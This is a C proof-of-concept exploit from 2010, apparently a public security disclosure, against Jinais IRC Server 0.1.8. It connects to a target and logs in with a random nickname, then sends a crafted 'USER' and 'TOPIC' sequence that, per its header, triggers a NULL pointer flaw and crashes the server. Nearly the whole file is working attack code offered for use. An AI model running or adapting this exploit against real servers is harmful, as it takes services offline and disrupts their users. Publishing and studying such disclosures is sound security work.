/*

    Jinais IRC Server 0.1.8 - NULL Pointer PoC
   
    This PoC will disconnect the affected target IRC server using
    a NULL Pointer vulnerability.

    Copyright 2010 Salvatore Fresta aka Drosophila

    This program is free software; you can redistribute it and/or
    modify it under the terms of  the  GNU General Public License
    as published by the  Free Software Foundation; either version
    2 of the License, or (at your option) any later version.

    This program  is  distributed  in the hope  that  it  will be
    useful, but WITHOUT ANY WARRANTY;  without  even the  implied
    warranty  of  MERCHANTABILITY  or  FITNESS  FOR  A PARTICULAR
    PURPOSE. See the GNU General Public License for more details.

    You should have  received a copy  of  the  GNU General Public
    License along  with  this program;  if not, write to the Free
    Software Foundation,Inc., 59 Temple Place, Suite 330, Boston,
    MA 02111-1307 USA

    http://www.gnu.org/licenses/gpl-2.0.txt

*/

#include <stdio.h>
#include <string.h>
#include <getopt.h>
#include <stdlib.h>
#include <time.h>
#ifdef WIN32
 #include <winsock.h>
 #define close closesocket
#else
 #include <sys/types.h>
 #include <sys/socket.h>
 #include <netinet/in.h>
 #include <unistd.h>
 #include <errno.h>
 #include <netdb.h>
#endif

#define BUFF_SIZE 256
#define DEFAULT_PORT 4002

int socket_connect(char *server, int port);
char *socket_receive(int sock, int tout);
int socket_send(int socket, char *buffer, size_t size);
int socket_close(int socket);

int main(int argc, char *argv[]) {

 int sd,
     rnd_num,
     len,
     port = DEFAULT_PORT;
 char pkg[BUFF_SIZE],
      *response = NULL,
      *host = NULL;
 
 if(argc < 2) {
  printf("\nJinais IRC Server 0.1.8 NULL Pointer PoC - (c) Salvatore Fresta"
         "\nhttp://www.salvatorefresta.net"
         "\n"
         "\nUsage: %s <target_hostname> <port> (default: %d)\n\n", argv[0], port);
  return -1;
 }
 
 srand(time(NULL));
 
 host = argv[1];
 if(argc > 2) port = atoi(argv[2]);
 
 printf("\nJinais IRC Server 0.1.8 NULL Pointer PoC - (c) Salvatore Fresta"
     "\nhttp://www.salvatorefresta.net"
     "\n\n[*] Connecting to %s:%hu...", host, port);
 
 sd = socket_connect(host, port);
 if(sd < 0) {
  printf("\n[-] Error on connect!\n\n");
  return -1;
 }
 
 printf("\n[+] Connection estabilished"
        "\n[*] Loggin to IRC server...");
 
login: 
 
 rnd_num = rand()%100+1;
 
 len = snprintf(pkg, sizeof(pkg), "NICK randomnickname%d\r\n", rnd_num);
 if(len < 0 || len > sizeof(pkg)) {
  perror("\n[-] Error: snprintf");
  socket_close(sd);
  return -1;
 }
 
 if(socket_send(sd, pkg, len) < 0) {
  perror("\n[-] Error: socket_send");
  socket_close(sd);
  return -1;
 }
 
 response = socket_receive(sd, 3);
 if(!response) {
  perror("\n[-] Error: socket_receive");
  socket_close(sd);
  return -1;
 }
 
 if(strstr(response, "Nickname is already in use")) {
  free(response);
  goto login;
 }
 free(response);
 
 printf("\n[+] Login successfully"
        "\n[*] Data sending...");
       
 rnd_num = rand()%100+1;
 len = snprintf(pkg, sizeof(pkg), "USER blabla\r\nTOPIC #ch%d\r\n", rnd_num);
 if(len < 0 || len > sizeof(pkg)) {
  perror("\n[-] Error: snprintf");
  socket_close(sd);
  return -1;
 }
 
 if(socket_send(sd, pkg, len) < 0) {
  perror("\n[-] Error: socket_send");
  socket_close(sd);
  return -1;
 }
 
 response = socket_receive(sd, 3);
 if(!response) {
  perror("\n[-] Error: socket_receive");
  socket_close(sd);
  return -1;
 }
 
 socket_close(sd);
 
 printf("\n[+] Data sent successfully"
        "\n[+] Connection closed\n\n");
 
 return 0;
 
}

int socket_connect(char *server, int port) {

 int sd;
 struct sockaddr_in sock;
 struct hostent *host = NULL;
 
#ifdef WIN32 
 WSADATA wsadata;
    if(WSAStartup(MAKEWORD(1,0), &wsadata)) return -1;
#endif
 
 memset(&sock, 0, sizeof(sock));
 
 if((sd = socket(AF_INET, SOCK_STREAM, 0)) < 0) return -1;
 
 sock.sin_family = AF_INET;
 sock.sin_port = htons(port);
 
 if(!(host=gethostbyname(server))) return -1;
 
 sock.sin_addr = *((struct in_addr *)host->h_addr);
 
 if(connect(sd, (struct sockaddr *) &sock, sizeof(sock)) < 0) return -1;
 
 return sd;
  
}

char *socket_receive(int sock, int tout) {

 int ret,
     byte_recv,
     oldpkglen = 0,
     pkglen = 0;
 char *buffer = NULL,
      tmp[128];
 struct timeval timeout;
 fd_set input;
 
 if(sock < 0) return NULL;
 
 while (1) {
  
  FD_ZERO(&input);
  FD_SET(sock, &input);
  
  if(tout > 0) {
   timeout.tv_sec  = tout;
   timeout.tv_usec = 0;
   ret = select(sock + 1, &input, NULL, NULL, &timeout);
  }
  else
   ret = select(sock + 1, &input, NULL, NULL, NULL);
 
  if (!ret) break;
  if (ret < 0) return NULL;
  
  byte_recv = recv(sock, tmp, sizeof(tmp), 0);
  
  if(byte_recv < 0) return NULL;
  
  if(!byte_recv) break;
  
  oldpkglen = pkglen;
  pkglen += byte_recv;
  
  buffer = (char *) realloc(buffer, pkglen+1);
  
  if(!buffer) return NULL;
  
  memcpy(buffer+oldpkglen, tmp, byte_recv);
 
 }
 
 if(buffer) buffer[pkglen] = 0;
 
 return buffer;
  
}

int socket_send(int socket, char *buffer, size_t size) {
 
 if(socket < 0) return -1;

 return send(socket, buffer, size, 0) < 0 ? -1 : 0;
 
}

int socket_close(int socket) {
 
 if(socket < 0) return -1;
 
 return close(socket) < 0 ? -1 : 0;
 
}